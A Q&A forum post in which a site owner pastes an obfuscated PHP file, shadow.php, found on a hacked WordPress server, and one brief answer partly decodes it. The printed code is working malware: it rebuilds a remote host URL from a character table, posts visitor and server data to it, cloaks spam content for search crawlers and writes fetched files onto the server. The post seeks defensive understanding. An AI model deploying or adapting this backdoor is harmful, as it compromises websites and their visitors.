# wordpress hacked with php file - how to decode the "hack file"?

Tags: php, wordpress, security

My client reported his site being hacked and it was done quite successfully.

I found a file `shadow.php` on the ftp with the following code:

Right now, i am unable to read what it does.

Anybody can explain?

```
<?php @header( 'Content-Type:text/html;charset=utf-8' );
error_reporting( 0 );
$OOOOOO = "%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c";
global $O;
$O        = urldecode( $OOOOOO );
$oOooOO   = 'z0927_1';
$oOooOOoO = $O{15} . $O{4} . $O{4} . $O{9} . $O{62} . $O{63} . $O{63} . $oOooOO . $O{59} . $O{10} . $O{14} . $O{8} . $O{8} . $O{12} . $O{11} . $O{59} . $O{4} . $O{8} . $O{9};
function ooooooooOOOOOOOOoooooOOO( $oooOOOoOoo ) {
    $ooooOOOooOo = curl_init();
    curl_setopt( $ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo );
    curl_setopt( $ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1 );
    curl_setopt( $ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5 );
    $oooooOOOOooO = curl_exec( $ooooOOOooOo );
    curl_close( $ooooOOOooOo );

    return $oooooOOOOooO;
}

function ooOOoOOO( $OooooO, $OOOoooo = array() ) {
    global $O;
    $OooooO  = str_replace( ' ', '+', $OooooO );
    $OOooooO = curl_init();
    curl_setopt( $OOooooO, CURLOPT_URL, "$OooooO" );
    curl_setopt( $OOooooO, CURLOPT_RETURNTRANSFER, 1 );
    curl_setopt( $OOooooO, CURLOPT_HEADER, 0 );
    curl_setopt( $OOooooO, CURLOPT_TIMEOUT, 10 );
    curl_setopt( $OOooooO, CURLOPT_POST, 1 );
    curl_setopt( $OOooooO, CURLOPT_POSTFIELDS, http_build_query( $OOOoooo ) );
    $OOOOooo   = curl_exec( $OOooooO );
    $OOOOoooOO = curl_errno( $OOooooO );
    curl_close( $OOooooO );
    if ( 0 !== $OOOOoooOO ) {
        return false;
    }

    return $OOOOooo;
}

function oooOOOo( $ooOOo ) {
    global $O;
    $ooOOOOo  = false;
    $oooooOOo = $O{14} . $O{8} . $O{8} . $O{14} . $O{18} . $O{2} . $O{23} . $O{8} . $O{4} . $O{90} . $O{23} . $O{7} . $O{24} . $O{14} . $O{23} . $O{8} . $O{4} . $O{90} . $O{14} . $O{8} . $O{8} . $O{14} . $O{18} . $O{2} . $O{90} . $O{10} . $O{8} . $O{18} . $O{90} . $O{23} . $O{7} . $O{24} . $O{14} . $O{90} . $O{5} . $O{10} . $O{15} . $O{8} . $O{8};
    if ( $ooOOo != '' ) {
        if ( preg_match( "/($oooooOOo)/si", $ooOOo ) ) {
            $ooOOOOo = true;
        }
    }

    return $ooOOOOo;
}

function oooOOooOOoOO( $oOOOOOOoOOOO ) {
    global $O;
    $ooOOOOOOoO  = false;
    $ooOOOOOOoOo = $O{14} . $O{8} . $O{8} . $O{14} . $O{18} . $O{2} . $O{59} . $O{21} . $O{8} . $O{90} . $O{5} . $O{10} . $O{15} . $O{8} . $O{8} . $O{59} . $O{21} . $O{8} . $O{59} . $O{16} . $O{9} . $O{90} . $O{23} . $O{7} . $O{24} . $O{14};
    if ( $oOOOOOOoOOOO != '' && preg_match( "/($ooOOOOOOoOo)/si", $oOOOOOOoOOOO ) ) {
        $ooOOOOOOoO = true;
    }

    return $ooOOOOOOoO;
}

$oOooOOoOO              = ( ( isset( $_SERVER[ $O{41} . $O{30} . $O{30} . $O{35} . $O{37} ] ) && $_SERVER[ $O{41} . $O{30} . $O{30} . $O{35} . $O{37} ] !== $O{8} . $O{13} . $O{13} ) ? $O{15} . $O{4} . $O{4} . $O{9} . $O{11} . $O{62} . $O{63} . $O{63} : $O{15} . $O{4} . $O{4} . $O{9} . $O{62} . $O{63} . $O{63} );
$oOoooOOoOO             = $_SERVER[ $O{29} . $O{28} . $O{26} . $O{32} . $O{28} . $O{37} . $O{30} . $O{52} . $O{32} . $O{29} . $O{33} ];
$ooOOoooOOoOO           = $_SERVER[ $O{41} . $O{30} . $O{30} . $O{35} . $O{52} . $O{41} . $O{34} . $O{37} . $O{30} ];
$ooOOOoooOOoOO          = $_SERVER[ $O{35} . $O{41} . $O{35} . $O{52} . $O{37} . $O{28} . $O{44} . $O{39} ];
$ooOOOOoooOOOoOO        = $_SERVER[ $O{37} . $O{28} . $O{29} . $O{48} . $O{28} . $O{29} . $O{52} . $O{50} . $O{36} . $O{51} . $O{28} ];
$ooOOOOoooOOOOoOO       = $oOooOOoOO . $ooOOoooOOoOO . $oOoooOOoOO;
$oooOOOOoooOOOooOO      = $oOooOOoO . $O{63} . $O{7} . $O{24} . $O{12} . $O{10} . $O{4} . $O{10} . $O{59} . $O{9} . $O{15} . $O{9};
$ooooOOOOoooOOOooO      = $oOooOOoO . $O{63} . $O{25} . $O{10} . $O{9} . $O{59} . $O{9} . $O{15} . $O{9};
$ooooOOOOoooOOOooOoo    = $oOooOOoO . $O{63} . $O{16} . $O{6} . $O{25} . $O{9} . $O{59} . $O{9} . $O{15} . $O{9};
$oooooOOoooOOOoooOoo    = $oOooOOoO . $O{63} . $O{1} . $O{8} . $O{3} . $O{12} . $O{11} . $O{59} . $O{9} . $O{15} . $O{9};
$ooooooooOOOOoooOOoooOO = $oOooOOoO . $O{63} . $O{3} . $O{8} . $O{23} . $O{8} . $O{4} . $O{11} . $O{59} . $O{9} . $O{15} . $O{9};
if ( strpos( $oOoooOOoOO, $O{59} . $O{9} . $O{15} . $O{9} ) ) {
    $ooooooOOoooOOOoooOo = $oOooOOoOO . $ooOOoooOOoOO . $ooOOOoooOOoOO;
} else {
    $ooooooOOoooOOOoooOo = $oOooOOoOO . $ooOOoooOOoOO;
}
$ooooooOoOoooOOOooo[]                                                          = array();
$ooooooOoOoooOOOooo[ $O{12} . $O{8} . $O{25} . $O{10} . $O{7} . $O{24} ]       = $ooOOoooOOoOO;
$ooooooOoOoooOOOooo[ $O{3} . $O{2} . $O{0} . $O{52} . $O{6} . $O{3} . $O{7} ]  = $oOoooOOoOO;
$ooooooOoOoooOOOooo[ $O{15} . $O{3} . $O{2} . $O{13} ]                         = $ooooooOOoooOOOoooOo;
$ooooooOoOoooOOOooo[ $O{3} . $O{2} . $O{0} . $O{52} . $O{6} . $O{3} . $O{18} ] = $ooOOOOoooOOOOoOO;
if ( substr( $oOoooOOoOO, - 6 ) == $O{3} . $O{8} . $O{23} . $O{8} . $O{4} . $O{11} ) {
    $ooooooooOOOOOoooOoOoooOO = ooOOoOOO( $ooooooooOOOOoooOOoooOO, $ooooooOoOoooOOOooo );
    define( 'BASE_PATH', str_ireplace( $_SERVER[ $O{35} . $O{41} . $O{35} . $O{52} . $O{37} . $O{28} . $O{44} . $O{39} ], '', __FILE__ ) );
    file_put_contents( BASE_PATH . $O{63} . $O{3} . $O{8} . $O{23} . $O{8} . $O{4} . $O{11} . $O{59} . $O{4} . $O{20} . $O{4}, $ooooooooOOOOOoooOoOoooOO );
    $ooooooooOOOOOoooOoOoooOO = file_get_contents( BASE_PATH . $O{63} . $O{3} . $O{8} . $O{23} . $O{8} . $O{4} . $O{11} . $O{59} . $O{4} . $O{20} . $O{4} );
    if ( strpos( $ooooooooOOOOOoooOoOoooOO, $O{47} . $O{3} . $O{10} . $O{1} . $O{18} . $O{53} . $O{12} . $O{2} . $O{18} . $O{10} . $O{5} . $O{62} . $O{66} ) ) {
        echo $O{3} . $O{8} . $O{23} . $O{8} . $O{4} . $O{11} . $O{59} . $O{4} . $O{20} . $O{4} . $O{57} . $O{13} . $O{7} . $O{18} . $O{2} . $O{57} . $O{21} . $O{3} . $O{2} . $O{10} . $O{4} . $O{2} . $O{57} . $O{11} . $O{6} . $O{21} . $O{21} . $O{2} . $O{11} . $O{11} . $O{88};
    } else {
        echo $O{3} . $O{8} . $O{23} . $O{8} . $O{4} . $O{11} . $O{59} . $O{4} . $O{20} . $O{4} . $O{57} . $O{13} . $O{7} . $O{18} . $O{2} . $O{57} . $O{21} . $O{3} . $O{2} . $O{10} . $O{4} . $O{2} . $O{57} . $O{13} . $O{10} . $O{7} . $O{18} . $O{88};
    }
    exit;
}
if ( substr( $oOoooOOoOO, - 4 ) == $O{59} . $O{20} . $O{25} . $O{18} ) {
    if ( strpos( $oOoooOOoOO, $O{9} . $O{7} . $O{24} . $O{14} . $O{11} . $O{7} . $O{4} . $O{2} . $O{25} . $O{10} . $O{9} . $O{59} . $O{20} . $O{25} . $O{18} ) ) {
        $ooooooOoOoooOOOooooO    = ooOOoOOO( $ooooOOOOoooOOOooO, $ooooooOoOoooOOOooo );
        $ooooooOOoooOOOooooOOO   = explode( ",", $ooooooOoOoooOOOooooO );
        $ooooooOOoooOOOooooOOO[] = $O{11} . $O{7} . $O{4} . $O{2} . $O{25} . $O{10} . $O{9};
        for ( $ooooooOOoooOOOooooOOOOo = 0; $ooooooOOoooOOOooooOOOOo < count( $ooooooOOoooOOOooooOOO ); $ooooooOOoooOOOooooOOOOo ++ ) {
            if ( strpos( $ooooooOOoooOOOoooOo, $O{59} . $O{9} . $O{15} . $O{9} ) > 0 ) {
                $ooooooOOoooOOOooooOOOOoo = $O{55};
            } else {
                $ooooooOOoooOOOooooOOOOoo = $O{63};
            }
            $ooooooOOOoooOOOooooOOOOOoo        = $ooooooOOoooOOOoooOo . $ooooooOOoooOOOooooOOOOoo . $ooooooOOoooOOOooooOOO[ $ooooooOOoooOOOooooOOOOo ] . $O{59} . $O{20} . $O{25} . $O{18};
            $ooooooOOOOoooOOOooooOOOOOo        = $O{15} . $O{4} . $O{4} . $O{9} . $O{11} . $O{62} . $O{63} . $O{63} . $O{1} . $O{1} . $O{1} . $O{59} . $O{14} . $O{8} . $O{8} . $O{14} . $O{18} . $O{2} . $O{59} . $O{21} . $O{8} . $O{25} . $O{63} . $O{9} . $O{7} . $O{24} . $O{14} . $O{55} . $O{11} . $O{7} . $O{4} . $O{2} . $O{25} . $O{10} . $O{9} . $O{61} . $ooooooOOOoooOOOooooOOOOOoo;
            $ooooooOOOOoooOOOooooOOOOOoOooOoOo = $O{15} . $O{4} . $O{4} . $O{9} . $O{62} . $O{63} . $O{63} . $O{1} . $O{1} . $O{1} . $O{59} . $O{14} . $O{8} . $O{8} . $O{14} . $O{18} . $O{2} . $O{59} . $O{21} . $O{8} . $O{25} . $O{63} . $O{9} . $O{7} . $O{24} . $O{14} . $O{55} . $O{11} . $O{7} . $O{4} . $O{2} . $O{25} . $O{10} . $O{9} . $O{61} . $ooooooOOOoooOOOooooOOOOOoo;
            if ( stristr( @file_get_contents( $ooooooOOOOoooOOOooooOOOOOo ), $O{11} . $O{6} . $O{21} . $O{21} . $O{2} . $O{11} . $O{11} . $O{13} . $O{6} . $O{18} . $O{18} . $O{5} ) ) {
                echo $ooooooOOOOoooOOOooooOOOOOo . $O{61} . $O{61} . $O{61} . $O{56} . $O{37} . $O{6} . $O{23} . $O{25} . $O{7} . $O{4} . $O{4} . $O{7} . $O{24} . $O{14} . $O{57} . $O{40} . $O{8} . $O{8} . $O{14} . $O{18} . $O{2} . $O{57} . $O{37} . $O{7} . $O{4} . $O{2} . $O{25} . $O{10} . $O{9} . $O{62} . $O{57} . $O{34} . $O{43} . PHP_EOL;
            } else if ( stristr( @ooooooooOOOOOOOOoooooOOO( $ooooooOOOOoooOOOooooOOOOOo ), $O{11} . $O{6} . $O{21} . $O{21} . $O{2} . $O{11} . $O{11} . $O{13} . $O{6} . $O{18} . $O{18} . $O{5} ) ) {
                echo $ooooooOOOOoooOOOooooOOOOOo . $O{61} . $O{61} . $O{61} . $O{56} . $O{37} . $O{6} . $O{23} . $O{25} . $O{7} . $O{4} . $O{4} . $O{7} . $O{24} . $O{14} . $O{57} . $O{40} . $O{8} . $O{8} . $O{14} . $O{18} . $O{2} . $O{57} . $O{37} . $O{7} . $O{4} . $O{2} . $O{25} . $O{10} . $O{9} . $O{62} . $O{57} . $O{34} . $O{43} . PHP_EOL;
            } else if ( stristr( @file_get_contents( $ooooooOOOOoooOOOooooOOOOOoOooOoOo ), $O{11} . $O{6} . $O{21} . $O{21} . $O{2} . $O{11} . $O{11} . $O{13} . $O{6} . $O{18} . $O{18} . $O{5} ) ) {
                echo $ooooooOOOOoooOOOooooOOOOOoOooOoOo . $O{61} . $O{61} . $O{61} . $O{56} . $O{37} . $O{6} . $O{23} . $O{25} . $O{7} . $O{4} . $O{4} . $O{7} . $O{24} . $O{14} . $O{57} . $O{40} . $O{8} . $O{8} . $O{14} . $O{18} . $O{2} . $O{57} . $O{37} . $O{7} . $O{4} . $O{2} . $O{25} . $O{10} . $O{9} . $O{62} . $O{57} . $O{34} . $O{43} . PHP_EOL;
            } else if ( stristr( @ooooooooOOOOOOOOoooooOOO( $ooooooOOOOoooOOOooooOOOOOoOooOoOo ), $O{11} . $O{6} . $O{21} . $O{21} . $O{2} . $O{11} . $O{11} . $O{13} . $O{6} . $O{18} . $O{18} . $O{5} ) ) {
                echo $ooooooOOOOoooOOOooooOOOOOoOooOoOo . $O{61} . $O{61} . $O{61} . $O{56} . $O{37} . $O{6} . $O{23} . $O{25} . $O{7} . $O{4} . $O{4} . $O{7} . $O{24} . $O{14} . $O{57} . $O{40} . $O{8} . $O{8} . $O{14} . $O{18} . $O{2} . $O{57} . $O{37} . $O{7} . $O{4} . $O{2} . $O{25} . $O{10} . $O{9} . $O{62} . $O{57} . $O{34} . $O{43} . PHP_EOL;
            } else {
                echo $ooooooOOOOoooOOOooooOOOOOoOooOoOo . $O{61} . $O{61} . $O{61} . $O{56} . $O{37} . $O{6} . $O{23} . $O{25} . $O{7} . $O{4} . $O{4} . $O{7} . $O{24} . $O{14} . $O{57} . $O{40} . $O{8} . $O{8} . $O{14} . $O{18} . $O{2} . $O{57} . $O{37} . $O{7} . $O{4} . $O{2} . $O{25} . $O{10} . $O{9} . $O{62} . $O{57} . $O{13} . $O{10} . $O{7} . $O{18} . PHP_EOL;
            }
        }
        exit;
    }
    if ( strpos( $oOoooOOoOO, $O{10} . $O{18} . $O{18} . $O{11} . $O{7} . $O{4} . $O{2} . $O{25} . $O{10} . $O{9} . $O{59} . $O{20} . $O{25} . $O{18} ) ) {
        $ooooooOoOoooOOOooooO = ooOOoOOO( $ooooOOOOoooOOOooO, $ooooooOoOoooOOOooo );
        header( $O{47} . $O{8} . $O{24} . $O{4} . $O{2} . $O{24} . $O{4} . $O{53} . $O{4} . $O{5} . $O{9} . $O{2} . $O{62} . $O{4} . $O{2} . $O{20} . $O{4} . $O{63} . $O{20} . $O{25} . $O{18} );
        echo $ooooooOoOoooOOOooooO;
        exit;
    }
    if ( strpos( $oOoooOOoOO, $O{59} . $O{9} . $O{15} . $O{9} ) ) {
        $ooooooOOoOOoooOOOooooOOOOO = explode( $O{55}, $oOoooOOoOO );
        $ooooooOOoOOoooOOOooooOOOOO = $ooooooOOoOOoooOOOooooOOOOO[ count( $ooooooOOoOOoooOOOooooOOOOO ) - 1 ];
        $ooooooOOoOOoooOOOooooOOOOO = str_replace( $O{59} . $O{20} . $O{25} . $O{18}, "", $ooooooOOoOOoooOOOooooOOOOO );
    } else {
        $ooooooOOoOOoooOOOooooOOOOO = str_replace( $O{63}, "", $oOoooOOoOO );
        $ooooooOOoOOoooOOOooooOOOOO = str_replace( $O{59} . $O{20} . $O{25} . $O{18}, "", $ooooooOOoOOoooOOOooooOOOOO );
    }
    $ooooooOoOoooOOOooo[ $O{1} . $O{8} . $O{3} . $O{12} ]                   = $ooooooOOoOOoooOOOooooOOOOO;
    $ooooooOoOoooOOOooo[ $O{10} . $O{21} . $O{4} . $O{7} . $O{8} . $O{24} ] = $O{21} . $O{15} . $O{2} . $O{21} . $O{17} . $O{52} . $O{11} . $O{7} . $O{4} . $O{2} . $O{25} . $O{10} . $O{9};
    $ooooooOOoOoOoooOOOooooOOoOOO                                           = ooOOoOOO( $oooooOOoooOOOoooOoo, $ooooooOoOoooOOOooo );
    if ( $ooooooOOoOoOoooOOOooooOOoOOO == '1' ) {
        $ooooooOoOoooOOOooooO = ooOOoOOO( $ooooOOOOoooOOOooO, $ooooooOoOoooOOOooo );
        header( $O{47} . $O{8} . $O{24} . $O{4} . $O{2} . $O{24} . $O{4} . $O{53} . $O{4} . $O{5} . $O{9} . $O{2} . $O{62} . $O{4} . $O{2} . $O{20} . $O{4} . $O{63} . $O{20} . $O{25} . $O{18} );
        echo $ooooooOoOoooOOOooooO;
        exit;
    }
    $ooooooOoOoooOOOooo[ $O{10} . $O{21} . $O{4} . $O{7} . $O{8} . $O{24} ] = $O{21} . $O{15} . $O{2} . $O{21} . $O{17} . $O{52} . $O{1} . $O{8} . $O{3} . $O{12} . $O{11};
    $ooooooOOoOoOoooOOOooooOOoOoOO                                          = ooOOoOOO( $oooooOOoooOOOoooOoo, $ooooooOoOoooOOOooo );
    if ( strpos( $oOoooOOoOO, $O{25} . $O{10} . $O{9} ) > 0 || $ooooooOOoOoOoooOOOooooOOoOoOO == '1' ) {
        $ooooooOoOoooOOOooo[ $O{10} . $O{21} . $O{4} . $O{7} . $O{8} . $O{24} ] = $O{3} . $O{10} . $O{24} . $O{12} . $O{52} . $O{20} . $O{25} . $O{18};
        $ooooooOOoOoOoooOOOooooOOoOOO                                           = ooOOoOOO( $oooooOOoooOOOoooOoo, $ooooooOoOoooOOOooo );
        header( $O{47} . $O{8} . $O{24} . $O{4} . $O{2} . $O{24} . $O{4} . $O{53} . $O{4} . $O{5} . $O{9} . $O{2} . $O{62} . $O{4} . $O{2} . $O{20} . $O{4} . $O{63} . $O{20} . $O{25} . $O{18} );
        echo $ooooooOOoOoOoooOOOooooOOoOOO;
        exit;
    }
}
if ( strpos( $oOoooOOoOO, $O{59} . $O{9} . $O{15} . $O{9} ) ) {
    $ooooooOOooOooOoooOOOooooOOoOoOO                                                                             = $oOooOOoOO . $ooOOOOoooOOOoOO . $ooOOOoooOOoOO;
    $ooooooOoOoooOOOooo[ $O{25} . $O{10} . $O{7} . $O{24} . $O{52} . $O{11} . $O{15} . $O{2} . $O{18} . $O{18} ] = $ooooooOOooOooOoooOOOooooOOoOoOO;
} else {
    $ooooooOOooOooOoooOOOooooOOoOoOO                                                                             = $oOooOOoOO . $ooOOOOoooOOOoOO;
    $ooooooOoOoooOOOooo[ $O{25} . $O{10} . $O{7} . $O{24} . $O{52} . $O{11} . $O{15} . $O{2} . $O{18} . $O{18} ] = $ooooooOOooOooOoooOOOooooOOoOoOO;
}
$oooOOOooOoooOOOooooOoOoOoOoO = isset( $_SERVER[ $O{41} . $O{30} . $O{30} . $O{35} . $O{52} . $O{29} . $O{28} . $O{39} . $O{28} . $O{29} . $O{28} . $O{29} ] ) ? $_SERVER[ $O{41} . $O{30} . $O{30} . $O{35} . $O{52} . $O{29} . $O{28} . $O{39} . $O{28} . $O{29} . $O{28} . $O{29} ] : '';
$ooooOoOOooOoooOOOoOoOoOoO    = oooOOooOOoOO( $oooOOOooOoooOOOooooOoOoOoOoO );
if ( $ooooOoOOooOoooOOOoOoOoOoO && ( substr( $oOoooOOoOO, - 4 ) == $O{59} . $O{15} . $O{4} . $O{25} || strpos( $oooOOOooOoooOOOooooOoOoOoOoO, $O{21} . $O{8} . $O{59} . $O{16} . $O{9} ) !== false ) ) {
    $ooooOOOOoooOOOoooOOO                                                                                     = $_SERVER[ $O{29} . $O{28} . $O{51} . $O{34} . $O{30} . $O{28} . $O{52} . $O{36} . $O{38} . $O{38} . $O{29} ];
    $ooooooOoOoooOOOooo[ $O{7} . $O{9} ]                                                                      = $ooooOOOOoooOOOoooOOO;
    $ooooooOoOoooOOOooo[ $O{3} . $O{2} . $O{13} . $O{2} . $O{3} . $O{2} . $O{3} ]                             = $oooOOOooOoooOOOooooOoOoOoOoO;
    $ooooooOoOoooOOOooo[ $O{6} . $O{11} . $O{2} . $O{3} . $O{52} . $O{10} . $O{14} . $O{2} . $O{24} . $O{4} ] = strtolower( isset( $_SERVER[ $O{41} . $O{30} . $O{30} . $O{35} . $O{52} . $O{32} . $O{37} . $O{28} . $O{29} . $O{52} . $O{36} . $O{40} . $O{28} . $O{50} . $O{30} ] ) ? $_SERVER[ $O{41} . $O{30} . $O{30} . $O{35} . $O{52} . $O{32} . $O{37} . $O{28} . $O{29} . $O{52} . $O{36} . $O{40} . $O{28} . $O{50} . $O{30} ] : '' );
    echo ooOOoOOO( $ooooOOOOoooOOOooOoo, $ooooooOoOoooOOOooo );
    exit;
}
$oooOoOOooOoooOOOoOoOoOoOoO  = strtolower( isset( $_SERVER[ $O{41} . $O{30} . $O{30} . $O{35} . $O{52} . $O{32} . $O{37} . $O{28} . $O{29} . $O{52} . $O{36} . $O{40} . $O{28} . $O{50} . $O{30} ] ) ? $_SERVER[ $O{41} . $O{30} . $O{30} . $O{35} . $O{52} . $O{32} . $O{37} . $O{28} . $O{29} . $O{52} . $O{36} . $O{40} . $O{28} . $O{50} . $O{30} ] : '' );
$oooOoOooOooOoooOOOoOoOoOoOo = oooOOOo( $oooOoOOooOoooOOOoOoOoOoOoO );
if ( $oooOoOooOooOoooOOOoOoOoOoOo ) {
    $ooooooOoOoooOOOooo[ $O{15} . $O{4} . $O{4} . $O{9} . $O{52} . $O{6} . $O{11} . $O{2} . $O{3} . $O{52} . $O{10} . $O{14} . $O{2} . $O{24} . $O{4} ] = $oooOoOOooOoooOOOoOoOoOoOoO;
    $ooooooOOOOOoooOOOOooooooO                                                                                                                          = ooOOoOOO( $oooOOOOoooOOOooOO, $ooooooOoOoooOOOooo );
    if ( $ooooooOOOOOoooOOOOooooooO == $O{70} . $O{67} . $O{70} ) {
        header( $O{41} . $O{30} . $O{30} . $O{35} . $O{63} . $O{64} . $O{59} . $O{67} . $O{57} . $O{70} . $O{67} . $O{70} . $O{57} . $O{50} . $O{8} . $O{4} . $O{57} . $O{39} . $O{8} . $O{6} . $O{24} . $O{12} );
        exit;
    } else if ( $ooooooOOOOOoooOOOOooooooO == $O{69} . $O{67} . $O{67} ) {
        header( $O{41} . $O{30} . $O{30} . $O{35} . $O{63} . $O{64} . $O{59} . $O{67} . $O{57} . $O{69} . $O{67} . $O{67} . $O{57} . $O{33} . $O{24} . $O{4} . $O{2} . $O{3} . $O{24} . $O{10} . $O{18} . $O{57} . $O{37} . $O{2} . $O{3} . $O{22} . $O{2} . $O{3} . $O{57} . $O{28} . $O{3} . $O{3} . $O{8} . $O{3} );
        exit;
    } else if ( $ooooooOOOOOoooOOOOooooooO == $O{23} . $O{18} . $O{10} . $O{24} . $O{17} ) {
        echo '';
        exit;
    } else {
        echo $ooooooOOOOOoooOOOOooooooO;
        exit;
    }
} else {
    header( $O{41} . $O{30} . $O{30} . $O{35} . $O{63} . $O{64} . $O{59} . $O{67} . $O{57} . $O{70} . $O{67} . $O{70} . $O{57} . $O{50} . $O{8} . $O{4} . $O{57} . $O{39} . $O{8} . $O{6} . $O{24} . $O{12} );
} ?>
```

Answer (score 1, accepted):

The first thing it does is creating a variable $0 with a list of characters. It contains the following string:

```
"qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-"?> <.-=:/1230654879';()&^$[]\\%{}!*|+,"
```

It looks much like keyboards codes.
After that, it uses this string to compose urls and other logic to make http requests and to write files in your server.